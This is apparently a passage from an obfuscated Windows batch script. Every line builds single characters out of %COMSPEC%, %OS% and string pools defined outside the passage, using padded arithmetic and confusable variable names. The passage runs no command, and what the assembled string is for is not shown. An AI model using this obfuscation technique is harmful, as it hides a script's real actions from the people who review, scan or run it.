set /a "v_i__O0I_I=(((-48-34)+50)+46)"
for /f "tokens=2 delims==" %%I in ('set v_i__O0I_I') do call call call set "v_c_IlIIOlO_l_=%%COMSPEC:~%%I,1%%"
set /a "v_i_OO_0l0=((7*2)-10)"
set "v_p_lO0_0O_IIO=v_l_l0__I0_OO_"
for /f "tokens=2 delims==" %%I in ('set v_i_OO_0l0') do for /f "delims=" %%A in ("!v_p_lO0_0O_IIO!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IIl0I0_0_l=!v_l_l0__I0_OO_!"
set /a "v_i_l_llI0=((((93-5)-49)+3)+(15-15))"
set "v_p__IOIll0OII=v_l_OO0IOlI0Il"
for /f "tokens=2 delims==" %%I in ('set v_i_l_llI0') do for /f "delims=" %%A in ("!v_p__IOIll0OII!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__0OIOll0OO=!v_l_OO0IOlI0Il!"
set /a "v_i__lll_0=(((32-28)*6)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i__lll_0') do call set "v_l__I__ll_Ill=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_O_I_l_l0I_=!v_l__I__ll_Ill!"
set /a "v_i_lll000=((13*2)+1)"
set "v_p_OOl0IlIlOI=v_l_IOl0_I0l00"
for /f "tokens=2 delims==" %%I in ('set v_i_lll000') do for /f "delims=" %%A in ("!v_p_OOl0IlIlOI!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_OlOI0I0_I_=!v_l_IOl0_I0l00!"
set /a "v_i_IOIOI_=(6+13)"
for /f "tokens=2 delims==" %%I in ('set v_i_IOIOI_') do call set "v_l__I_0OOlIlO=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IO0___lIll=!v_l__I_0OOlIlO!"
set /a "v_i_II00O0=(37+21)"
set "v_p_IIOl__II0_=v_l_O_O_0_O0OO"
for /f "tokens=2 delims==" %%I in ('set v_i_II00O0') do for /f "delims=" %%A in ("!v_p_IIOl__II0_!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_l__0OlO__O=!v_l_O_O_0_O0OO!"
set /a "v_i__I0Ol_=((((8*3)+2)*2)+(18-18))"
for /f "tokens=2 delims==" %%I in ('set v_i__I0Ol_') do call set "v_l_OI0Ol0O0OI=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_I_00IO00_I=!v_l_OI0Ol0O0OI!"
set /a "v_i_IIO000=(((((1*2)+1)*5)+3)+29)"
set "v_p__lIl__O_0l=v_l_lI_lI0_I_I"
for /f "tokens=2 delims==" %%I in ('set v_i_IIO000') do for /f "delims=" %%A in ("!v_p__lIl__O_0l!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_lIO_I_____=!v_l_lI_lI0_I_I!"
set /a "v_i_OIllI_=(((-32+43)+16)+25)"
for /f "tokens=2 delims==" %%I in ('set v_i_OIllI_') do call set "v_l_IIl0l00_ll=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_IIO0OOl__O=!v_l_IIl0l00_ll!"
set /a "v_i_I__l0O=((1*6)+1)"
set "v_p_llIl__llI0=v_l_IlI_0l__IO"
for /f "tokens=2 delims==" %%I in ('set v_i_I__l0O') do for /f "delims=" %%A in ("!v_p_llIl__llI0!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_l_0_I0I_lI=!v_l_IlI_0l__IO!"
set /a "v_i_Oll_l0=((13+30)+(2-2))"
set "v_p_lOO__I__lI=v_l_I_O0_lI0lO"
for /f "tokens=2 delims==" %%I in ('set v_i_Oll_l0') do for /f "delims=" %%A in ("!v_p_lOO__I__lI!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_lO_IO00lOl=!v_l_I_O0_lI0lO!"
set /a "v_i_lIIO_0=(((15+18)*2)-7)"
set "v_p_lllI0IllOO=v_l_lllO0l_l0I"
for /f "tokens=2 delims==" %%I in ('set v_i_lIIO_0') do for /f "delims=" %%A in ("!v_p_lllI0IllOO!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c___0lI0l_Il=!v_l_lllO0l_l0I!"
set /a "v_i_llI_l_=(((-43+44)*6)+5)"
set "v_p_OIllO0Ol0l=v_l_IOOlO_0OI0"
for /f "tokens=2 delims==" %%I in ('set v_i_llI_l_') do for /f "delims=" %%A in ("!v_p_OIllO0Ol0l!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_l0ll_Il0_l=!v_l_IOOlO_0OI0!"
set /a "v_i__ll0_l=((((1*5)+2)*3)+2)"
set "v_p_lO_0__I0l_=v_l__lllIlOIO_"
for /f "tokens=2 delims==" %%I in ('set v_i__ll0_l') do for /f "delims=" %%A in ("!v_p_lO_0__I0l_!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_IlOOlIO_O_=!v_l__lllIlOIO_!"
set /a "v_i_ll000l=(83-19)"
set "v_p_lII_l_OI0O=v_l_l0l0_IO__0"
for /f "tokens=2 delims==" %%I in ('set v_i_ll000l') do for /f "delims=" %%A in ("!v_p_lII_l_OI0O!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lIOlIlllI0=!v_l_l0l0_IO__0!"
set /a "v_i_lIO0_O=(((12*2)+1)+8)"
set "v_p_II_OOOll0O=v_l_l_0_O0OlI0"
for /f "tokens=2 delims==" %%I in ('set v_i_lIO0_O') do for /f "delims=" %%A in ("!v_p_II_OOOll0O!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_llI__llIIl=!v_l_l_0_O0OlI0!"
set /a "v_i_O_0lIl=((((14*2)-28)*5)+1)"
set "v_p___l0l0_l_O=v_l_I_IOl0II0O"
for /f "tokens=2 delims==" %%I in ('set v_i_O_0lIl') do for /f "delims=" %%A in ("!v_p___l0l0_l_O!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_II__O0I0OO=!v_l_I_IOl0II0O!"
set /a "v_i__O_lOI=((((((-1*6)+2)*3)+1)+42)+(29-29))"
set "v_p__00l_l0IOO=v_l_IlOll_I_0_"
for /f "tokens=2 delims==" %%I in ('set v_i__O_lOI') do for /f "delims=" %%A in ("!v_p__00l_l0IOO!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_l0IOllllII=!v_l_IlOll_I_0_!"
set /a "v_i_lI_OII=((((-50+38)+16)*5)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i_lI_OII') do call set "v_l__OOII_lOlO=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IOll0I0I0O=!v_l__OOII_lOlO!"
set /a "v_i_OIllI0=(((((6*3)+2)*2)+1)+10)"
set "v_p_lO__OOl0Il=v_l___llOII0OI"
for /f "tokens=2 delims==" %%I in ('set v_i_OIllI0') do for /f "delims=" %%A in ("!v_p_lO__OOl0Il!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__OlO_OO_O0=!v_l___llOII0OI!"
set /a "v_i_I_O00I=(((110-45)-22)+(20-20))"
set "v_p_l_Ol_O00I0=v_l_I_O_l0_000"
for /f "tokens=2 delims==" %%I in ('set v_i_I_O00I') do for /f "delims=" %%A in ("!v_p_l_Ol_O00I0!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_IIIO___II0=!v_l_I_O_l0_000!"
set /a "v_i_ll0OOI=((((46-35)*6)+3)-32)"
set "v_p___000O0OOO=v_l_O_0OI_llOl"
for /f "tokens=2 delims==" %%I in ('set v_i_ll0OOI') do for /f "delims=" %%A in ("!v_p___000O0OOO!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OOlI0Ill0O=!v_l_O_0OI_llOl!"
set /a "v_i__I_I_l=32"
set "v_p_lO0ll_0IOI=v_l_lOlO_O_Ol_"
for /f "tokens=2 delims==" %%I in ('set v_i__I_I_l') do for /f "delims=" %%A in ("!v_p_lO0ll_0IOI!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c___l_IOlI__=!v_l_lOlO_O_Ol_!"
set /a "v_i_llIIIl=((32-24)+40)"
set "v_p_l___OOI00I=v_l__O0Ol_llII"
for /f "tokens=2 delims==" %%I in ('set v_i_llIIIl') do for /f "delims=" %%A in ("!v_p_l___OOI00I!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c__OI0I0lII0=!v_l__O0Ol_llII!"
set /a "v_i_llI_lO=(((29-9)-6)+48)"
for /f "tokens=2 delims==" %%I in ('set v_i_llI_lO') do call set "v_l____0O0IO0_=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O00O0_llIl=!v_l____0O0IO0_!"
set /a "v_i_O0ll_l=(100-46)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0ll_l') do call set "v_l___Ill0lO0l=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lOOlOOI_l0=!v_l___Ill0lO0l!"
set /a "v_i_O0Il0_=(-2+30)"
set "v_p_IIIl_0II0I=v_l_lOOIO_O_IO"
for /f "tokens=2 delims==" %%I in ('set v_i_O0Il0_') do for /f "delims=" %%A in ("!v_p_IIIl_0II0I!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_O0__lOI0_O=!v_l_lOOIO_O_IO!"
set /a "v_i_lll_lO=((8*5)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_lll_lO') do call set "v_l_O000I_II00=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_l0Il00OOI_=!v_l_O000I_II00!"
set /a "v_i_OllII0=(((43-41)*2)+47)"
set "v_p___lllO0Ol0=v_l_Il_OOOO0OO"
for /f "tokens=2 delims==" %%I in ('set v_i_OllII0') do for /f "delims=" %%A in ("!v_p___lllO0Ol0!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_OlIOl_OO_0=!v_l_Il_OOOO0OO!"
set /a "v_i__IIIlI=((((-39+9)+37)*3)+(7-7))"
set "v_p_I0IIllO0__=v_l_l0_0_lO0__"
for /f "tokens=2 delims==" %%I in ('set v_i__IIIlI') do for /f "delims=" %%A in ("!v_p_I0IIllO0__!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__IO0__l0lI=!v_l_l0_0_lO0__!"
set /a "v_i_llOllI=((111-35)-35)"
set "v_p_OI_IIlI0IO=v_l_OIOO0OOO0_"
for /f "tokens=2 delims==" %%I in ('set v_i_llOllI') do for /f "delims=" %%A in ("!v_p_OI_IIlI0IO!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c__0_IO__O__=!v_l_OIOO0OOO0_!"
set /a "v_i_lO0l00=(((162-46)-48)-21)"
set "v_p_I0I0OlO_0_=v_l__OOl0IIl0_"
for /f "tokens=2 delims==" %%I in ('set v_i_lO0l00') do for /f "delims=" %%A in ("!v_p_I0I0OlO_0_!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_O__00_l0OI=!v_l__OOl0IIl0_!"
set /a "v_i_l0l0_0=(((13+23)+2)+(17-17))"
for /f "tokens=2 delims==" %%I in ('set v_i_l0l0_0') do call set "v_l_lI0_OI_00_=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__Ol00I0Ol0=!v_l_lI0_OI_00_!"
set /a "v_i_lIOl_l=((((0*3)+2)*6)+4)"
for /f "tokens=2 delims==" %%I in ('set v_i_lIOl_l') do call set "v_l_I0_I_llO0O=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_OOl0_0Il__=!v_l_I0_I_llO0O!"
set /a "v_i_IllI0O=((103-44)+(8-8))"
set "v_p_l_I_IOIOI0=v_l_l0l__Il___"
for /f "tokens=2 delims==" %%I in ('set v_i_IllI0O') do for /f "delims=" %%A in ("!v_p_l_I_IOIOI0!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_O_l0_0OI0l=!v_l_l0l__Il___!"
set /a "v_i_IIlI0O=((((-38+49)*3)+1)+(5-5))"
set "v_p_II_lOI0I_0=v_l_l_O0lIl0_O"
for /f "tokens=2 delims==" %%I in ('set v_i_IIlI0O') do for /f "delims=" %%A in ("!v_p_II_lOI0I_0!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_I0llll0lOI=!v_l_l_O0lIl0_O!"
set /a "v_i_llI0IO=12"
set "v_p__O_Ol_OO0l=v_l__lIII0O0lO"
for /f "tokens=2 delims==" %%I in ('set v_i_llI0IO') do for /f "delims=" %%A in ("!v_p__O_Ol_OO0l!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O_0OOlOO0O=!v_l__lIII0O0lO!"
set /a "v_i__OllI0=(((14*2)+1)+(20-20))"
set "v_p_O_OO000lIl=v_l_l0O0OI_ll0"
for /f "tokens=2 delims==" %%I in ('set v_i__OllI0') do for /f "delims=" %%A in ("!v_p_O_OO000lIl!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_lO_OOIOOl_=!v_l_l0O0OI_ll0!"
set /a "v_i_I000__=((((-2-4)*3)+1)+36)"
for /f "tokens=2 delims==" %%I in ('set v_i_I000__') do call set "v_l_O00O00I0lI=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_l00OII0_l0=!v_l_O00O00I0lI!"
set /a "v_i__lllOI=(39+10)"
set "v_p_____IOIO_I=v_l_O_Ol00O_0O"
for /f "tokens=2 delims==" %%I in ('set v_i__lllOI') do for /f "delims=" %%A in ("!v_p_____IOIO_I!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__I00O_l0l0=!v_l_O_Ol00O_0O!"
set /a "v_i__OOlOO=((84-27)-12)"
set "v_p_IIOlOIl_ll=v_l__II_OlIOIO"
for /f "tokens=2 delims==" %%I in ('set v_i__OOlOO') do for /f "delims=" %%A in ("!v_p_IIOlOIl_ll!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_O0lO_OIlI0=!v_l__II_OlIOIO!"
set /a "v_i_I_0lOl=((5*6)+5)"
set "v_p__IllI__I__=v_l_OlOl0__O0l"
for /f "tokens=2 delims==" %%I in ('set v_i_I_0lOl') do for /f "delims=" %%A in ("!v_p__IllI__I__!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__l_0_O0Ol0=!v_l_OlOl0__O0l!"
set /a "v_i_l_OI00=(((0*5)+1)*3)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_OI00') do call call call set "v_c_IlIl0_IOI0=%%OS:~%%I,1%%"
set /a "v_i____0_O=((2*6)+2)"
set "v_p___IlOI_lOl=v_l_I_IlOIlOl0"
for /f "tokens=2 delims==" %%I in ('set v_i____0_O') do for /f "delims=" %%A in ("!v_p___IlOI_lOl!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_O00_I__I0l=!v_l_I_IlOIlOl0!"
set /a "v_i_Ol_Il0=(65-50)"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol_Il0') do call set "v_l_O0lOOI_OIO=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lOOlOIOIl0=!v_l_O0lOOI_OIO!"
set /a "v_i_I_lIIO=(((2*3)+45)+(3-3))"
set "v_p_lI0lOOOOOI=v_l__O_IlIOOIO"
for /f "tokens=2 delims==" %%I in ('set v_i_I_lIIO') do for /f "delims=" %%A in ("!v_p_lI0lOOOOOI!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_l_0_l_Olll=!v_l__O_IlIOOIO!"
set /a "v_i_OlI0II=((15*2)+28)"
for /f "tokens=2 delims==" %%I in ('set v_i_OlI0II') do call call call set "v_c___ll_0lOOO=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set /a "v_i_OO_0OO=(6*2)"
for /f "tokens=2 delims==" %%I in ('set v_i_OO_0OO') do call set "v_l_l_l0Olll00=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__l0_0I0IIl=!v_l_l_l0Olll00!"
set /a "v_i__0OllO=((8*2)+42)"
set "v_p__0l_I0I_0_=v_l_Il00I0lOl_"
for /f "tokens=2 delims==" %%I in ('set v_i__0OllO') do for /f "delims=" %%A in ("!v_p__0l_I0I_0_!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_l__IlIOII0=!v_l_Il00I0lOl_!"
set /a "v_i_lOlOO_=((((-3*3)*2)+1)+23)"
set "v_p_II00II_l_O=v_l__O__IO_lO0"
for /f "tokens=2 delims==" %%I in ('set v_i_lOlOO_') do for /f "delims=" %%A in ("!v_p_II00II_l_O!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_lI__I00_I_=!v_l__O__IO_lO0!"
set /a "v_i_l_Olll=(((-6-16)+1)+50)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_Olll') do call call call set "v_c_ll0lIO0IIO=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set /a "v_i_II_O0l=((-2+8)+19)"
for /f "tokens=2 delims==" %%I in ('set v_i_II_O0l') do call set "v_l_l0OOOll_00=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__II0O__II0=!v_l_l0OOOll_00!"
set /a "v_i_l0O_l0=((-11+33)+(23-23))"
set "v_p_lOOOO0_lI_=v_l__III_O00Il"
for /f "tokens=2 delims==" %%I in ('set v_i_l0O_l0') do for /f "delims=" %%A in ("!v_p_lOOOO0_lI_!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lI0l0OI0ll=!v_l__III_O00Il!"
set /a "v_i_lO0__0=(13*3)"
for /f "tokens=2 delims==" %%I in ('set v_i_lO0__0') do call set "v_l_lIII_0OOll=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__O_IlIOlI0=!v_l_lIII_0OOll!"
set /a "v_i_lI_IlI=((-8+25)-10)"
for /f "tokens=2 delims==" %%I in ('set v_i_lI_IlI') do call set "v_l__0_I_O_I0O=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_OI_0__00Il=!v_l__0_I_O_I0O!"
set /a "v_i_I0O_l0=(111-49)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0O_l0') do call set "v_l__0IIO_I_0I=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_II_0_IOlO_=!v_l__0IIO_I_0I!"
set /a "v_i__l___0=((7*3)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i__l___0') do call call call set "v_c__0lI_ll_0I=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set /a "v_i_ll__O0=((50-17)*2)"
set "v_p_lOOIIIOOOl=v_l_lI0lOllIll"
for /f "tokens=2 delims==" %%I in ('set v_i_ll__O0') do for /f "delims=" %%A in ("!v_p_lOOIIIOOOl!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_I_l00IlIO_=!v_l_lI0lOllIll!"
set /a "v_i__II_OI=(((18*3)+2)-28)"
set "v_p_Il_0llIII0=v_l__O_0Il0I__"
for /f "tokens=2 delims==" %%I in ('set v_i__II_OI') do for /f "delims=" %%A in ("!v_p_Il_0llIII0!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__I_IOlOl__=!v_l__O_0Il0I__!"
set /a "v_i_ll_OIO=((98-43)+(6-6))"
for /f "tokens=2 delims==" %%I in ('set v_i_ll_OIO') do call set "v_l_l0000O0_0l=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_OOO_OI0O__=!v_l_l0000O0_0l!"
set /a "v_i_O_OIlO=((5*4)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_OIlO') do call call call set "v_c__OO00_lI_0=%%COMSPEC:~%%I,1%%"
set /a "v_i_Ol_lO_=(((43-1)-26)+(6-6))"
set "v_p_IIl_Il_OOl=v_l_O_l0_0I_I_"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol_lO_') do for /f "delims=" %%A in ("!v_p_IIl_Il_OOl!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_llll_IIIO_=!v_l_O_l0_0I_I_!"
set /a "v_i_IOO0l0=((13+15)*2)"
for /f "tokens=2 delims==" %%I in ('set v_i_IOO0l0') do call call call set "v_c_Illl__000_=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set /a "v_i_lOlOl0=((77-30)+(10-10))"
for /f "tokens=2 delims==" %%I in ('set v_i_lOlOl0') do call set "v_l_Oll0_III_I=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_IlIl_lOlIO=!v_l_Oll0_III_I!"
set /a "v_i_l_lll0=(85-49)"
set "v_p_IIO0IlIIIl=v_l__Ol_l0II0I"
for /f "tokens=2 delims==" %%I in ('set v_i_l_lll0') do for /f "delims=" %%A in ("!v_p_IIO0IlIIIl!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_II0O0__O0l=!v_l__Ol_l0II0I!"
set /a "v_i_ll_O0O=((((18-11)*6)+4)+(16-16))"
for /f "tokens=2 delims==" %%I in ('set v_i_ll_O0O') do call set "v_l_l_lI_ll__O=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IlO0_II00O=!v_l_l_lI_ll__O!"
set /a "v_i__OI00l=(((34*2)+1)-3)"
for /f "tokens=2 delims==" %%I in ('set v_i__OI00l') do call set "v_l__IIOl_OI0I=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_III0l0I00O=!v_l__IIOl_OI0I!"
set /a "v_i__llOII=(47-9)"
for /f "tokens=2 delims==" %%I in ('set v_i__llOII') do call set "v_l_lOIIOlO0O0=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_Il0OOlI000=!v_l_lOIIOlO0O0!"
set /a "v_i__ll__l=(10+9)"
set "v_p_I_0_O__lIO=v_l__I0OIO_l_O"
for /f "tokens=2 delims==" %%I in ('set v_i__ll__l') do for /f "delims=" %%A in ("!v_p_I_0_O__lIO!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_lOOl0ll0Ol=!v_l__I0OIO_l_O!"
set /a "v_i_Ol_0__=((22+7)+(21-21))"
set "v_p_O0ll0O00II=v_l__IlOIOll00"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol_0__') do for /f "delims=" %%A in ("!v_p_O0ll0O00II!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c___l_0OO00l=!v_l__IlOIOll00!"
set /a "v_i_IO0I_l=(7+38)"
for /f "tokens=2 delims==" %%I in ('set v_i_IO0I_l') do call set "v_l_OlI_OI0lO0=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_I0_0_IO00_=!v_l_OlI_OI0lO0!"
set /a "v_i_l00l__=(61-6)"
for /f "tokens=2 delims==" %%I in ('set v_i_l00l__') do call set "v_l__O0_0lllO0=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_lll_O_0OI_=!v_l__O0_0lllO0!"
set /a "v_i_OOllIO=(((79-39)-1)+(27-27))"
for /f "tokens=2 delims==" %%I in ('set v_i_OOllIO') do call call call set "v_c__I0_I0OO_I=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set /a "v_i__0lII_=(((22-37)+31)+20)"
set "v_p_l_lOI0IllO=v_l_lO0l_0_OlI"
for /f "tokens=2 delims==" %%I in ('set v_i__0lII_') do for /f "delims=" %%A in ("!v_p_l_lOI0IllO!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lll_Oll0OO=!v_l_lO0l_0_OlI!"
set /a "v_i_IlO0_0=((((6*6)+1)-21)-8)"
set "v_p_ll_OIIO0l0=v_l_O__000l_OI"
for /f "tokens=2 delims==" %%I in ('set v_i_IlO0_0') do for /f "delims=" %%A in ("!v_p_ll_OIIO0l0!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_Il0_0OO_II=!v_l_O__000l_OI!"
set /a "v_i__OOl_I=(10+31)"
set "v_p_O0I0lO0Il0=v_l_IIIlIl0Ol0"
for /f "tokens=2 delims==" %%I in ('set v_i__OOl_I') do for /f "delims=" %%A in ("!v_p_O0I0lO0Il0!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OIlII_lOll=!v_l_IIIlIl0Ol0!"
set /a "v_i_OO_lOO=(47-12)"
set "v_p_IIlIl__0l0=v_l_II_l_0l__O"
for /f "tokens=2 delims==" %%I in ('set v_i_OO_lOO') do for /f "delims=" %%A in ("!v_p_IIlIl__0l0!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_O_IlOI_l_0=!v_l_II_l_0l__O!"
set /a "v_i_l_Il0_=(((-43+44)*6)+1)"
set "v_p__II0O0_IOO=v_l_O0_I_0I0I0"
for /f "tokens=2 delims==" %%I in ('set v_i_l_Il0_') do for /f "delims=" %%A in ("!v_p__II0O0_IOO!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_III0lI__Ol=!v_l_O0_I_0I0I0!"
set /a "v_i_ll_lOl=((((37-11)-20)*6)+5)"
for /f "tokens=2 delims==" %%I in ('set v_i_ll_lOl') do call set "v_l_l_OlIIl__0=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c____0l0IOOl=!v_l_l_OlIIl__0!"
set /a "v_i__00lO0=(((-4+2)+10)*5)"
set "v_p___0OOIO_II=v_l_lIOlII0l0_"
for /f "tokens=2 delims==" %%I in ('set v_i__00lO0') do for /f "delims=" %%A in ("!v_p___0OOIO_II!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__Ill_Ol0_I=!v_l_lIOlII0l0_!"
set /a "v_i_O_lOlI=(-22+31)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_lOlI') do call call call set "v_c_O0_O_lIIl_=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set /a "v_i_ll0I0I=((((-42+48)*3)+7)+(16-16))"
for /f "tokens=2 delims==" %%I in ('set v_i_ll0I0I') do call call call set "v_c__0_IOl_I__=%%%%pool_II_00lOI:~%%I,1%%%%"
set /a "v_i_I0_I00=56"
for /f "tokens=2 delims==" %%I in ('set v_i_I0_I00') do call set "v_l_I0I0OIl_ll=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O0__lIO__l=!v_l_I0I0OIl_ll!"
set /a "v_i_O_Il0I=((((4*6)+3)+31)-27)"
set "v_p__O000_0Il0=v_l_OIO0__00I0"
for /f "tokens=2 delims==" %%I in ('set v_i_O_Il0I') do for /f "delims=" %%A in ("!v_p__O000_0Il0!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__I0lOOIl__=!v_l_OIO0__00I0!"
set /a "v_i_l0OIO0=(((4*6)+5)+(1-1))"
set "v_p_lOl__O_OOl=v_l_I__lI00I00"
for /f "tokens=2 delims==" %%I in ('set v_i_l0OIO0') do for /f "delims=" %%A in ("!v_p_lOl__O_OOl!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OOlII_O0_O=!v_l_I__lI00I00!"
set /a "v_i__Il0II=(74-48)"
for /f "tokens=2 delims==" %%I in ('set v_i__Il0II') do call set "v_l_O0OOlOO__I=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c__l0IIII00O=!v_l_O0OOlOO__I!"
set /a "v_i__Il__O=((((0*5)*4)*5)+3)"
set "v_p_l__OOOllO_=v_l_l_III0OOlI"
for /f "tokens=2 delims==" %%I in ('set v_i__Il__O') do for /f "delims=" %%A in ("!v_p_l__OOOllO_!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_I0lII0lO00=!v_l_l_III0OOlI!"
set /a "v_i_IIOOOl=(((22*3)-5)+(6-6))"
for /f "tokens=2 delims==" %%I in ('set v_i_IIOOOl') do call call call set "v_c_I0OI__OIO_=%%%%pool_II_00lOI:~%%I,1%%%%"
set /a "v_i__00l0_=(12+48)"
for /f "tokens=2 delims==" %%I in ('set v_i__00l0_') do call set "v_l_OI00l__0_l=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O__I0OI0l_=!v_l_OI00l__0_l!"
set /a "v_i_O00llO=((((49*2)+1)-45)+(19-19))"
for /f "tokens=2 delims==" %%I in ('set v_i_O00llO') do call set "v_l_lOO00l_Oll=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lOl0l0O0_0=!v_l_lOO00l_Oll!"
set /a "v_i__O__I_=((((-8+15)*3)+2)*2)"
for /f "tokens=2 delims==" %%I in ('set v_i__O__I_') do call set "v_l__I_l000lIO=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_l_O_0_O__I=!v_l__I_l000lIO!"
set /a "v_i_IO0I0_=((0*5)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i_IO0I0_') do call set "v_l_l_I_I_OI_O=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OIIIOl_0OI=!v_l_l_I_I_OI_O!"
set /a "v_i_l_00OI=((16*4)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_00OI') do call set "v_l_ll__O0000_=%%%%pool_OOl_0ll_:~%%I,1%%%%"
